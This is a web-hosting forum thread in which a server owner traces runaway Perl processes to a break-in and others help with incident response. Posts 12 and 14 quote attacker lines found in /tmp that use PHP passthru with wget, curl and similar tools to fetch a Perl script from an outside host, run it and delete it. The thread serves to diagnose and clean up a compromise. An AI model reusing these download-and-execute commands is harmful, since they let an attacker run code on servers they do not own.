Results 1 to 15 of 15
  1. #1
    Join Date
    Mar 2005
    Posts
    533

    * Perl make High Process

    Hello

    Perl get much procees on my server.
    what shoudl I do?

    2909 nobody 25 0 6868 3720 1248 R 95 0.2 4:11.94 perl
    1985 nobody 25 0 6812 3720 1248 R 90 0.2 4:32.36 perl
    11710 nobody 25 0 6036 3596 1128 R 87 0.2 1:41.88 perl
    10162 nobody 25 0 5832 3592 1128 R 50 0.2 1:41.39 perl
    3883 nobody 25 0 7108 3592 1128 R 49 0.2 2:49.42 perl

    Thanks

  2. #2
    Join Date
    Apr 2002
    Location
    USA
    Posts
    5,779
    cat /proc/2909/environ

    post the results.

  3. #3
    Join Date
    Mar 2005
    Posts
    533
    this s the result :-?

    ^@^@^@^@^@^@^@^@^@^@^@^@^@ $

    what is it?
    Thank

  4. #4
    Join Date
    Apr 2002
    Location
    USA
    Posts
    5,779
    Are you running suexec? What kind of control panel are you running if any?

  5. #5
    Join Date
    Mar 2005
    Posts
    533
    Yes, I checked athrough Cpanel and it is enabled.

    My Control Panel is Cpanel

    Thanks

  6. #6
    Join Date
    Mar 2005
    Posts
    533
    sorry! WHM is my Control Panel

  7. #7
    Join Date
    Mar 2005
    Posts
    533
    I have Checked the hig process through whm , Show Current CPU Usage

    first of all the commands are [syslogd] and when I trace it shows some lines like _ and - , and this line just repeat like a loop

    select(8, [4], NULL, NULL, {0, 0}) = 0 (Timeout)
    What is wrong? :-s

    Thanks

  8. #8
    Join Date
    Apr 2002
    Location
    USA
    Posts
    5,779
    You are hacked.

    Look around in temp and /dev/shm for strange files.

    Perl shoudl never be running as nobody if you have suexec enabled.

    Suggest you hire a admin like rack911 to take a look for you.

  9. #9
    Join Date
    Apr 2004
    Location
    India
    Posts
    211
    You can also use C in top to check locate the path of the script that is being run on the server.

    This should help you locate the script better.

    Also you should check /tmp, /dev/shm and proxy for any strange files.

    The best way to solve this would be to hire a server admin

  10. #10
    Join Date
    Mar 2005
    Posts
    533
    I checked /dev/shm and there is no file in it


    this is the /tmp content /tmp

    sess_5ec7f49ad187177e0198e7d53c53c404
    ../ sess_5f8aee3034c5583c613b017ae880444a
    16 sess_62495553a8b8dfe0ec33ec67c0ccd0ac
    21 sess_634c5a1244398fa4d16013c55eb55efe
    27 sess_64db1acbd40e26a02ede264e906f99ec
    40 sess_65f612aeed739790213a44aa81365d99
    46 sess_6789468421943d0f781ca727a40d52cb
    47 sess_6f497dcfcbde131272667de9ccb79be4
    5 sess_6f5c8a267e93f7b0eea42c796c8381b3
    7 sess_7217e4828039f3d5061485cc7bbe7c96
    9 sess_72cfa28bdef5d8f2dfa94c048c037eef
    a.1 sess_74e3111a0b719d89518ebb06b5fa8825
    a.2 sess_76f91ef4e6755fcc1799329a37169dd9
    a.3 sess_783b703a8b7485a6f7bf488d7f932307
    a.4 sess_7937af46a92210e4df02a2cda53150ee
    aquota.user* sess_7a64a686805ee32fb3da439cc9159975
    core.11710 sess_7c4a4421544a15b22bafc394bbe7f039
    cpbandwidth/ sess_7c6d1ee5d417a9cb2dca88e3665f0f20
    error_404.php sess_7da5655fb41e9b7e0c4a689e2fa20e96
    error_404.php.1 sess_7db6def6f245cbcdc01d172d8e424a27
    error_404.php.2 sess_7e3c15b7e2d5782efb147efd0642f8e3
    error_404.php.3 sess_80c43f38ded2f5be1b39b595832468fd
    horde_503.log sess_823d5fe2927159a9fdd489f1042bb923
    .ICE-unix/ sess_84e458a5ddfefa7abc9f8207c4e68322
    lost+found/ sess_864abcd3dd901188a2779d66b100b614
    mt-throttle.db sess_87c565c582c1d4a0e06e276aa109077d
    mysql.sock@ sess_89b933a8ca308cc9bdff5f947294734e
    nobody-session-0.496715847476484 sess_9157ddc8d3e8189778c108493106c0d8
    pear/ sess_936e2f7e62e583ac6957e55db02a35de
    ppp sess_975ea97e5c88d207aba4d7cdb2a1ee6f
    quota.user* sess_9db673901f3fae60a514389ffe0149d7
    .sess sess_9f8ef5f3a386b623c64a59d88c389501
    sess_06b93cc6268c5452084ef24ec507333f sess_a0fdecdd57290e378839fca63453c862
    sess_06ba2a32fe5a56b7e452ddb955453f5b sess_a21a459a57c281082b71f5eb0feae766
    sess_06e38b295ae235b8fd5be3a9911a9506 sess_a23adba75b27fc9a989d155d216d1744
    sess_088518867af64a0f53221a7c4ec0f339 sess_a61085c816a0214cf1099d920a1451bd
    sess_0be798c385438fcd6af329e5fdb4d9fb sess_a61c8d21525857670ec26e9e6e51d7de
    sess_0e36a8fcfeeac917546070f263660b5b sess_a634a3e464377505aacf750de425b57e
    sess_0f6e0261d6a531ff702e606d01e487fd sess_a7ee379b68ec05ae98a39e1e549f12a6
    sess_0fbc51fae1ae10d45f0a2b84ca9bfa5c sess_acbc94b4b384bb16c5566d039cdce810
    sess_1326df102dac3a1dacfdd36692b1f0c6 sess_b10922547f5ae190c747d8e8f5634511
    sess_13fd033e5047052b5ee619718821f5c6 sess_b436afc0bfe84e22f1515e1fe61bfd09
    sess_151c1cc6f13654b5df936139e24d8bc8 sess_bb26b763376c4a0288f393f5b065fb91
    sess_173358e951eeb5d2c7ae03a8e07a6a4a sess_bd084817b733326e7111a0603fbaa28f
    sess_18182f999abddc104bbfa94eab1174c2 sess_bd511f7bdcf181de7d63a5e9d9d55b63
    sess_1ca7fdda57c7dcf06767e17f51e66043 sess_bee62693e8ecd3a150bdfdc6c2f2b16c
    sess_1cec3efe2d86ccd78d47026fe25a2ded sess_bf248712b656f80f50c11faa6501585e
    sess_1dc1654c30b1dd556cf356e05992e810 sess_c0df13f96c3c4ddf5b83e8e5bf6f0168
    sess_273a4b31b263bdfb3b737157bf26980c sess_c16e20a951f971f0d001ff542eeb2dd8
    sess_28170654292f599ab5f9a65816243f7a sess_c2574c28b4bd76698f79ae7d176d6c1e
    sess_2a3a6c68c9fb72bdae8eb6609f31fd20 sess_c480c63de91b059687b1e3cf5da9d336
    sess_2d016dd514fce697edcdaf16ae500859 sess_c7b23467e7ac68f6f188c74bae79fec1
    sess_2f80f51fe29e3cee711a95f6e49730fc sess_ca87ee14bd8872a4e05f15b45f4c25a6
    sess_300d23d7276ec3222ff54a6eab724e8b sess_ce3023dd8f2e22ba614b9c4715b876a7
    sess_30220fede42844092df697399bb69d98 sess_cf65061743cf5207d662cbefbe8bb291
    sess_30fdf5aae6c559bbeb41991d2b24c731 sess_cfdb3df962c17dfae04e34ba65d5d203
    sess_3159c7947c19c1e3bceaf02ea9a01b14 sess_d72324b32f78fbe288334fcdc23e053b
    sess_34246447e4784da2e8d6aa91c501f0de sess_da5c423db5be8ef58a13c0e7d8442b08
    sess_34b995a12f6d88389eaed1cdec92b176 sess_db613f9330e9224728d7f5fe2152162a
    sess_354ab0deaee51f421c2620277fac38a3 sess_dbacca169dfcf851785048131b499e31
    sess_368a87871fa9a3de78177836d2dbf9ef sess_dc5e920a3829b2f75150dc69d4ea1dfd
    sess_37d510fb3e595efc0e31a057762b5784 sess_deleted
    sess_37d566f1940e1a7485e884066f4ba6d5 sess_df4abead700b0c9d68489fc8c12d47ac
    sess_3905614dca5593e0a2c850c5284e2ae8 sess_e023ad2bf461885edebb076ef2dc6681
    sess_3b6cec6b1ec1092d06638b7e769519aa sess_e3a8895f3f2e7628a5aff6b1bce7228a
    sess_405b54fd3ad70a1ab43246aa3d0204a0 sess_e3c80fe8a751fb3ac9cecbd21d79e990
    sess_409228c6fd50f2a34542b689aa6bf303 sess_e490c8ec42af6651b78be492b91738d8
    sess_40d43df8f637aed978603092418ca004 sess_e98498365745c968fecaf9eeab7cb09e
    sess_41ba9e381ed2b2175d1917ee0734d75c sess_e9c7b950c877175ac9cd65b851c7de13
    sess_41f543b77b220d7606e76dea84bf5608 sess_eb9843deda283f704cce70c4087fadb7
    sess_432e0fd3d38768712a45e8cb79726dd6 sess_ebae1fa28ec0bb4dad0f771ffbfe0ed2
    sess_43da4fbda105276bdba7a087a1e9d187 sess_ec8abbd122cbeee0298679aebbc32c2f
    sess_457c626aabeb683b8e5315a822b14cac sess_ee2344a758ca4386b453adab781ae6a4
    sess_45f14d0e03452cf2d05b0d8ee288b839 sess_efacfa79275eecc4b3b4be0aedd224d0
    sess_47847e3199f18258cd94f6c86ea7e33d sess_f267b3e358179663ddc843b4ced9ed9a
    sess_48b49690f7932ed7a822ec7115c1026b sess_f291d7c9760211f76c932f1f7f65de77
    sess_4aefadb56c4e1de43445200ee0c33e64 sess_f4d677bbc30332b667c3d5f155a2f979
    sess_537e8972f5bc3e8db1911ff0bb05a77a sess_fb0e1c14908a0f202963ebbfddd44316
    sess_577cce2f7aab72f67219ec02f884c903 sess_fb3c379f2dee4e15cb95d889f4b19961
    sess_57a292c92f14ed32bf51b8160dd879ca sess_fc1acc904cb621c67e0cbb17b8c5e33f
    sess_58b6009d1f4498c0f1359270970d0dea sess_fd06907fbd2bed683900d6aa08012a33
    sess_5cfe450c7f841d4300d9e5f84faf550f


    what are these sess_ ?

    Help me !

    Thanks

  11. #11
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,549
    sess_ are the seesions of your websites, these are fine.

    You may want to check anything other than sess_ files(however they may be backdoors named as sessions)

    Check for perl in the scripts in /tmp

    grep -i "perl" /tmp/*

    View things easier

    ls -al /tmp | grep -v sess_

    For a start -> ppp
    Server Management - AdminGeekZ.com
    Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
    WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implimentation, DDoS Protection, Custom Nginx Modules
    Check our wordpress varnish plugin. Contact us for quote: [email protected]

  12. #12
    Join Date
    Mar 2005
    Posts
    533
    this is the result for grep -i "perl" /tmp/*

    /tmp/lalis.txt:passthru('cd /tmp;wget http://foro-bot.webcindario.com/lali.txt;perl lali.txt;rm -f lali.txt*');
    /tmp/lalis.txt:passthru('cd /tmp;curl -O http://foro-bot.webcindario.com/lalis.txt;perl lali.txt;rm -f lali.txt*');
    /tmp/lalis.txt:passthru('cd /tmp;lwp-download http://foro-bot.webcindario.com/lali.txt;perl lali.txt;rm -f lali.txt*');
    /tmp/lalis.txt:passthru('cd /tmp;lynx -lali http://foro-bot.webcindario.com/lali.txt >nlali.txt;perl lali.txt;rm -f lali.txt*');
    /tmp/lalis.txt:passthru('cd /tmp;fetch http://foro-bot.webcindario.com/lali.txt;perl lali.txt;rm -f txt*');
    /tmp/lalis.txt:passthru('cd /tmp;GET http://foro-bot.webcindario.com/lali.txt;perl lali.txt;rm -f lali.txt*');


    how can I get to know how he has penetrated my server?
    I have just reinstalled the server and just 1 day is passing :-s

    Thanks

  13. #13
    Join Date
    Mar 2005
    Posts
    533
    it seems that even my .bach_history is not making history of any command.

    how can I enable it again?
    I want to do sth not to allow anyone to clear it

    Thanks

  14. #14
    Join Date
    Apr 2002
    Location
    USA
    Posts
    5,779
    /tmp/lalis.txt:passthru('cd /tmp;wget http://foro-bot.webcindario.com/lali.txt;perl lali.txt;rm -f lali.txt*');

    That is your hack job running.

    type grep lali.txt /usr/local/apache/domlogs/ *.* and you may see the script or hole they used to upload the files to your server.

    Suggest you install mod_security if you have not already done so.
    PM me for a good rule set you can use that will stop a lot of these attacks.

  15. #15
    Join Date
    Mar 2005
    Posts
    533
    I execyted type grep lali.txt /usr/local/apache/domlogs/ *.*and get many result as below :

    -bash: type: daccuntusername-popbytes_log.offset: not found

    what is it?

    "you may see the script or hole they used to upload the files to your server. " what should I look for?

    Thanks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •